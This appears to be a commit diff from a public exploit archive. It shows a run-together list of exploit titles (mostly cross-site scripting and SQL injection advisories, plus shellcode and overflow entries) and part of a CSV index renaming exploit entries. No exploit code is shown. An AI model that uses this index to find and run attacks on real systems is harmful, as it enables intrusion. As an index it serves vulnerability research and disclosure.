Scripting and HTML Injection Vulnerabilities Mahara 1.4.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities Flogr 'tag' Parameter Multiple Cross Site Scripting Vulnerabilities Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities AdaptCMS 2.0.2 - 'index.php' Script Cross Site Scripting AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting web@all Cross Site Scripting Commentics 'index.php' Cross Site Scripting web@all Cross-Site Scripting Commentics 'index.php' Cross-Site Scripting Adiscan LogAnalyzer 3.4.3 Cross Site Scripting Adiscan LogAnalyzer 3.4.3 Cross-Site Scripting CMS Lokomedia Multiple Cross Site Scripting and HTML Injection Vulnerabilities CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Phonalisa Multiple HTML-Injection Cross-Site Scripting Phonalisa - Multiple HTML-Injection Cross-Site Scripting FCKEditor Core - (Editor 'spellchecker.php') Cross Site Scripting FCKEditor Core - (Editor 'spellchecker.php') Cross-Site Scripting TEMENOS T24 Multiple Cross Site Scripting Vulnerabilities TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities SWFUpload 'movieName' Parameter Cross Site Scripting SWFUpload 'movieName' Parameter Cross-Site Scripting Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities Joomla 2.5.x Language Switcher ModuleMultiple Cross-Site Scripting Vulnerabilities php MBB Cross Site Scripting and SQL Injection php MBB Cross-Site Scripting and SQL Injection WordPress SocialFit Plugin 'msg' Parameter Cross Site Scripting WordPress custom tables Plugin 'key' Parameter Cross Site Scripting WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting WordPress Knews Multilingual Newsletters Plugin Cross Site Scripting WordPress PHPFreeChat 'url' Parameter Cross Site Scripting WordPress Knews Multilingual Newsletters Plugin Cross-Site Scripting WordPress PHPFreeChat 'url' Parameter Cross-Site Scripting MGB Multiple Cross Site Scripting and SQL Injection MGB - Multiple Cross-Site Scripting / SQL Injection Funeral Script PHP Cross Site Scripting and SQL Injection Funeral Script PHP Cross-Site Scripting and SQL Injection Simple Machines 2.0.2 Multiple HTML Injection Vulnerabilities Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities web@all 'name' Parameter Cross Site Scripting web@all 'name' Parameter Cross-Site Scripting REDAXO 'subpage' Parameter Cross Site Scripting REDAXO 'subpage' Parameter Cross-Site Scripting Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities phpBB Multiple SQL Injection JW Player 'playerready' Parameter Cross Site Scripting phpBB - Multiple SQL Injection JW Player 'playerready' Parameter Cross-Site Scripting Distimo Monitor Multiple Cross Site Scripting Vulnerabilities ManageEngine Applications Manager Multiple Cross Site Scripting and SQL Injection Distimo Monitor Multiple Cross-Site Scripting Vulnerabilities ManageEngine Applications Manager Multiple Cross-Site Scripting and SQL Injection ntop 'arbfile' Parameter Cross Site Scripting ntop 'arbfile' Parameter Cross-Site Scripting Zenoss 3.2.1 Multiple Security Vulnerabilities Elefant CMS 'id' Parameter Cross Site Scripting Worksforweb iAuto - Multiple Cross Site Scripting / HTML Injection Vulnerabilities Zenoss 3.2.1 - Multiple Security Vulnerabilities Elefant CMS 'id' Parameter Cross-Site Scripting Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting PolarisCMS 'WebForm_OnSubmit()' Function Cross-Site Scripting ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities ConcourseSuite Multiple Cross-Site Scripting and Cross Site Request Forgery Vulnerabilities Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities Hotel Booking Portal 0.1 - Multiple SQL Injection / Cross-Site Scripting Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities mIRC 'projects.php' Cross Site Scripting MindTouch DekiWiki Multiple Remote and Local File Inclusion Total Shop UK eCommerce CodeIgniter Multiple Cross-Site Scripting Vulnerabilities mIRC 'projects.php' Cross-Site Scripting MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion ShopperPress WordPress Theme - SQL Injection / Cross Site Scripting ShopperPress WordPress Theme - SQL Injection / Cross-Site Scripting LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting SaltOS 'download.php' Cross Site Scripting IBM Rational ClearQuest 8.0 Multiple Security Vulnerabilities Jara 1.6 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities OrderSys 1.6.4 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities Banana Dance Cross Site Scripting and SQL Injection JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting SaltOS 'download.php' Cross-Site Scripting IBM Rational ClearQuest 8.0 - Multiple Security Vulnerabilities Jara 1.6 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities OrderSys 1.6.4 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities Banana Dance - Cross-Site Scripting / SQL Injection SiNG cms 'password.php' Cross Site Scripting SiNG cms 'password.php' Cross-Site Scripting Monstra Multiple HTML Injection Vulnerabilities KindEditor 'name' Parameter Cross Site Scripting Monstra - Multiple HTML Injection Vulnerabilities KindEditor 'name' Parameter Cross-Site Scripting Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities JW Player 'logo.link' Parameter Cross Site Scripting Websense Content Gateway Multiple Cross-Site Scripting Vulnerabilities JW Player 'logo.link' Parameter Cross-Site Scripting Power-eCommerce Multiple Cross Site Scripting Vulnerabilities WordPress Finder 'order' Parameter Cross Site Scripting Power-eCommerce Multiple Cross-Site Scripting Vulnerabilities WordPress Finder 'order' Parameter Cross-Site Scripting LibGuides Multiple Cross Site Scripting Vulnerabilities Mihalism Multi Host 'users.php' Cross Site Scripting LibGuides Multiple Cross-Site Scripting Vulnerabilities Mihalism Multi Host 'users.php' Cross-Site Scripting Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities PrestaShop 1.4.7 Multiple Cross Site Scripting Vulnerabilities Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities TomatoCart 'example_form.ajax.php' Cross Site Scripting TomatoCart 'example_form.ajax.php' Cross-Site Scripting Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities Crowbar 'file' Parameter Multiple Cross-Site Scripting Vulnerabilities phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities Kayako Fusion 'download.php' Cross Site Scripting phpFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities Kayako Fusion 'download.php' Cross-Site Scripting Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage Hawkeye-G 3.0.1.4912 - Persistent XSS / Information Leakage LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting WordPress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting WordPress Slideshow Plugin Multiple Cross-Site Scripting Vulnerabilities Printer Pro 5.4.3 IOS - Persistent Cross Site Scripting Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting Flogr 'index.php' Multiple Cross Site Scripting Vulnerabilities Flogr 'index.php' Multiple Cross-Site Scripting Vulnerabilities ExtCalendar 2.0 Multiple SQL Injection and HTML Injection Vulnerabilities ExtCalendar 2.0 - Multiple SQL Injection and HTML Injection Vulnerabilities WordPress Download Monitor Plugin 'dlsearch' Parameter Cross Site Scripting WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting Openfiler 2.3 Multiple Cross Site Scripting and Information Disclosure Vulnerabilities Openfiler 2.3 - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities Atlassian Confluence 3.4.x Error Page Cross Site Scripting Atlassian Confluence 3.4.x Error Page Cross-Site Scripting vBSEO 'u' parameter Cross Site Scripting vBSEO 'u' parameter Cross-Site Scripting minimal Gallery 'index.php' Multiple Cross Site Scripting Vulnerabilities minimal Gallery 'index.php' Multiple Cross-Site Scripting Vulnerabilities AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities AxisInternet VoIP Manager Multiple Cross-Site Scripting Vulnerabilities WordPress Purity Theme Multiple Cross Site Scripting Vulnerabilities Poweradmin 'index.php' Cross Site Scripting WordPress MF Gig Calendar Plugin Cross Site Scripting WordPress Purity Theme Multiple Cross-Site Scripting Vulnerabilities Poweradmin 'index.php' Cross-Site Scripting WordPress MF Gig Calendar Plugin Cross-Site Scripting WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting YCommerce Multiple SQL Injection YCommerce - Multiple SQL Injection WordPress Token Manager Plugin 'tid' Parameter Cross Site Scripting WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross Site Scripting Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross-Site Scripting WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities Zenphoto 'admin-news-articles.php' Cross Site Scripting WordPress Akismet Plugin Multiple Cross-Site Scripting Vulnerabilities Zenphoto 'admin-news-articles.php' Cross-Site Scripting Interspire Email Marketer - (Cross Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities Interspire Email Marketer - (Cross-Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities CMS Mini 0.2.2 - 'index.php' Script Cross Site Scripting CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting WordPress Wordfence Security Plugin Cross Site Scripting WordPress Wordfence Security Plugin Cross-Site Scripting SMF 'view' Parameter Cross Site Scripting Inventory Multiple Cross Site Scripting and SQL Injection SMF 'view' Parameter Cross-Site Scripting Inventory Multiple Cross-Site Scripting and SQL Injection Gramophone 'rs' Parameter Cross Site Scripting Gramophone 'rs' Parameter Cross-Site Scripting WANem Multiple Cross Site Scripting Vulnerabilities CorePlayer 'callback' Parameter Cross Site Scripting WANem Multiple Cross-Site Scripting Vulnerabilities CorePlayer 'callback' Parameter Cross-Site Scripting NetCat CMS Multiple Cross Site Scripting Vulnerabilities SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting NetCat CMS Multiple Cross-Site Scripting Vulnerabilities SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross-Site Scripting bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities bloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass WebKit Cross-Site Scripting Filter 'XSSAuditor.cpp' Security Bypass Elastix 'page' Parameter Cross Site Scripting TinyMCPUK 'test' Parameter Cross Site Scripting Elastix 'page' Parameter Cross-Site Scripting TinyMCPUK 'test' Parameter Cross-Site Scripting Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities Multiple Fortinet FortiWeb Appliances Multiple Cross-Site Scripting Vulnerabilities PHP Address Book 'group' Parameter Cross Site Scripting PHP Address Book 'group' Parameter Cross-Site Scripting cPanel 'account' Parameter Cross Site Scripting cPanel 'account' Parameter Cross-Site Scripting WHM 'filtername' Parameter Cross Site Scripting cPanel 'dir' Parameter Cross Site Scripting WHM 'filtername' Parameter Cross-Site Scripting cPanel 'dir' Parameter Cross-Site Scripting Joomla! Incapsula Component Multiple Cross Site Scripting Vulnerabilities WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross Site Scripting Joomla! Incapsula Component Multiple Cross-Site Scripting Vulnerabilities WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting Dell OpenManage Server Administrator Cross Site Scripting Dell OpenManage Server Administrator Cross-Site Scripting Quick.Cms/Quick.Cart Cross Site Scripting Quick.Cms/Quick.Cart Cross-Site Scripting Apache OFBiz 10.4.x Multiple Cross Site Scripting Vulnerabilities Scripts Genie Classified Ultra - SQL Injection / Cross Site Scripting Apache OFBiz 10.4.x Multiple Cross-Site Scripting Vulnerabilities Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting Perforce P4Web Multiple Cross Site Scripting Vulnerabilities gpEasy CMS 'section' Parameter Cross Site Scripting Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities gpEasy CMS 'section' Parameter Cross-Site Scripting Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross Site Scripting WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities AbanteCart 'index.php' Multiple Cross-Site Scripting Vulnerabilities Sonar Multiple Cross Site Scripting Vulnerabilities Sonar Multiple Cross-Site Scripting Vulnerabilities MIMEsweeper For SMTP Multiple Cross Site Scripting Vulnerabilities MIMEsweeper For SMTP Multiple Cross-Site Scripting Vulnerabilities Squirrelcart 'table' Parameter Cross Site Scripting Squirrelcart 'table' Parameter Cross-Site Scripting CKEditor 'posteddata.php' Cross Site Scripting CKEditor 'posteddata.php' Cross-Site Scripting WordPress Pretty Link Plugin Cross Site Scripting WordPress Pretty Link Plugin Cross-Site Scripting Zenphoto 'index.php' SQL Injection PHPmyGallery 1.5 - Local File Disclosure / Cross Site Scripting OpenEMR 'site' Parameter Cross Site Scripting ZeroClipboard 1.9.x - 'id' Parameter Cross Site Scripting Zenphoto - 'index.php' SQL Injection PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting OpenEMR 'site' Parameter Cross-Site Scripting ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross Site Scripting Vulnerabilities Batavi 'index.php' Cross Site Scripting WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities Batavi 'index.php' Cross-Site Scripting JForum 'jforum.page' Multiple Cross Site Scripting Vulnerabilities Geeklog Cross Site Scripting JForum 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities Geeklog Cross-Site Scripting WordPress Uploader Plugin 'blog' Parameter Cross Site Scripting WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting HP Intelligent Management Center 'topoContent.jsf' Cross-Site Scripting WordPress Count Per Day Plugin 'daytoshow' Parameter Cross-Site Scripting Your Own Classifieds Cross Site Scripting McAfee Vulnerability Manager - 'cert_cn' Parameter Cross Site Scripting Your Own Classifieds Cross-Site Scripting McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities Asteriskguru Queue Statistics 'warning' Parameter Cross-Site Scripting WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting Petite Annonce Cross Site Scripting Petite Annonce Cross-Site Scripting WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross-Site Scripting Jaow CMS 'add_ons' Parameter Cross Site Scripting Jaow CMS 'add_ons' Parameter Cross-Site Scripting IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross Site Scripting Vulnerabilities OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting C2 WebResource 'File' Parameter Cross Site Scripting e107 - 'content_preset.php' Cross Site Scripting IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities OrionDB Web Directory Multiple Cross-Site Scripting Vulnerabilities WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting C2 WebResource 'File' Parameter Cross-Site Scripting e107 - 'content_preset.php' Cross-Site Scripting Zimbra 'aspell.php' Cross Site Scripting Zimbra 'aspell.php' Cross-Site Scripting WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution Dream CMS 2.3.0 - CSRF Add Extension / File Upload PHP Code Execution jPlayer 'Jplayer.swf' Script Cross Site Scripting jPlayer 'Jplayer.swf' Script Cross-Site Scripting Matrix42 Service Store 'default.aspx' Cross Site Scripting Matrix42 Service Store 'default.aspx' Cross-Site Scripting Crafty Syntax Live Help 3.1.2 - Remote File Inclusion and Path Disclosure Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Path Disclosure RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities RealtyScript 4.0.2 - Multiple CSRF / Persistent XSS Vulnerabilities Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS Cisco Linksys E4200 /apply.cgi - Multiple Parameter XSS MyBB Game Section Plugin 'games.php' Multiple Cross Site Scripting Vulnerabilities Securimage 'example_form.php' Cross Site Scripting WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting MyBB Game Section Plugin 'games.php' Multiple Cross-Site Scripting Vulnerabilities Securimage 'example_form.php' Cross-Site Scripting WordPress Securimage-WP Plugin 'siwp_test.php' Cross-Site Scripting Jojo CMS 'search' Parameter Cross Site Scripting Jojo CMS 'search' Parameter Cross-Site Scripting Elastix Multiple Cross Site Scripting Vulnerabilities Telaen 2.7.x Cross Site Scripting Elastix Multiple Cross-Site Scripting Vulnerabilities Telaen 2.7.x Cross-Site Scripting WordPress Ambience Theme 'src' Parameter Cross Site Scripting WordPress Ambience Theme 'src' Parameter Cross-Site Scripting Xaraya Multiple Cross Site Scripting Vulnerabilities Xaraya - Multiple Cross-Site Scripting Vulnerabilities Nameko 'nameko.php' Cross Site Scripting Nameko 'nameko.php' Cross-Site Scripting Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross Site Scripting Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross Site Scripting WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross-Site Scripting WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross Site Scripting WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross Site Scripting Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting Mintboard Multiple Cross Site Scripting Vulnerabilities miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities Mintboard Multiple Cross-Site Scripting Vulnerabilities miniBB SQL Injection and Multiple Cross-Site Scripting Vulnerabilities WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities WordPress Pie Register Plugin 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities Corda .NET Redirector 'redirector.corda' Cross Site Scripting Corda .NET Redirector 'redirector.corda' Cross-Site Scripting Apache Struts 2.2.3 Multiple Open Redirection Vulnerabilities Apache Struts 2.2.3 - Multiple Open Redirection Vulnerabilities YardRadius Multiple Local Format String Vulnerabilities YardRadius - Multiple Local Format String Vulnerabilities WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting Magnolia CMS Multiple Cross Site Scripting Vulnerabilities WordPress Duplicator Plugin Cross Site Scripting WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting Magnolia CMS Multiple Cross-Site Scripting Vulnerabilities WordPress Duplicator Plugin Cross-Site Scripting AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities AlgoSec Firewall Analyzer Cross Site Scripting AlgoSec Firewall Analyzer Cross-Site Scripting DotNetNuke 6.1.x Cross Site Scripting DotNetNuke 6.1.x Cross-Site Scripting Bo-Blog 2.1.1 Cross Site Scripting and SQL Injection Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Netwin SurgeFTP Sever 23d6 - Stored Cross-Site Scripting Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access Oracle Glassfish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access Bugzilla 'editflagtypes.cgi' Multiple Cross Site Scripting Vulnerabilities Bugzilla 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities Course Registration Management System Cross Site Scripting and SQL Injection Course Registration Management System Cross-Site Scripting and SQL Injection WordPress Plugin WP Easy Poll 1.1.3 - XSS and CSRF WordPress Plugin WP Easy Poll 1.1.3 - XSS / CSRF Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection Rhino Cross Site Scripting and Password Reset Security Bypass Vulnerabilities Rhino Cross-Site Scripting and Password Reset Security Bypass Vulnerabilities Maian Uploader 4.0 Multiple Security Vulnerabilities Maian Uploader 4.0 - Multiple Security Vulnerabilities Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross Site Scripting Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross-Site Scripting ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access Xangati /servlet/MGConfigData - Multiple Parameter Remote Path Traversal File Access ZamFoo Multiple Remote Command Execution Vulnerabilities ZamFoo - Multiple Remote Command Execution Vulnerabilities WordPress DZS-VideoGallery Plugin - Cross Site Scripting / Command Injection WordPress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2 Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (1) Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (2) Chamilo LMS - Persistent Cross Site Scripting Chamilo LMS - Persistent Cross-Site Scripting WordPress Site Import Plugin 1.0.1 - Local and Remote File Inclusion WordPress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion PHP 5.5.33 / <= 7.0.4 - SNMP Format String Exploit PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning ImageMagick 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick) ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick) ImageMagick 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) iBilling 3.7.0 - Stored and Reflected XSS iBilling 3.7.0 - Stored XSS / Reflected XSS CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR bypass) CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR Bypass) WordPress Booking Calendar Plugin 6.2 - SQL Injection WordPress WP Live Chat Support Plugin 6.2.03 - Stored XSS WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) CSRF Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC --- files.csv | 1696 ++++++++++++++++--------------- platforms/php/webapps/40189.txt | 45 + platforms/php/webapps/40190.txt | 92 ++ platforms/php/webapps/40191.txt | 83 ++ platforms/windows/dos/40192.py | 26 + 5 files changed, 1096 insertions(+), 846 deletions(-) create mode 100755 platforms/php/webapps/40189.txt create mode 100755 platforms/php/webapps/40190.txt create mode 100755 platforms/php/webapps/40191.txt create mode 100755 platforms/windows/dos/40192.py diff --git a/files.csv b/files.csv index 73df4a77e..cbad31258 100755 --- a/files.csv +++ b/files.csv @@ -106,7 +106,7 @@ id,file,description,date,author,platform,type,port 106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 -110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 +110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit",2003-10-13,Haggis,linux,remote,21 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 @@ -136,11 +136,11 @@ id,file,description,date,author,platform,type,port 138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 140,platforms/linux/local/140.c,"Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 -141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)",2004-01-06,"Christophe Devine",linux,local,0 -142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0 +141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (1)",2004-01-06,"Christophe Devine",linux,local,0 +142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (Proof of Concept) (2)",2004-01-07,"Christophe Devine",linux,local,0 143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow Exploit",2004-01-14,Li0n7,linux,remote,0 144,platforms/linux/local/144.c,"SuSE Linux 9.0 - YaST config Skribt Local Exploit",2004-01-15,l0om,linux,local,0 -145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / <= 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0 +145,platforms/linux/local/145.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Local Root Exploit (3)",2004-01-15,"Paul Starzetz",linux,local,0 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1<= 0.9.6j 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 @@ -148,13 +148,13 @@ id,file,description,date,author,platform,type,port 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 152,platforms/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 -154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / <= 2.4.24 / <= 2.6.2 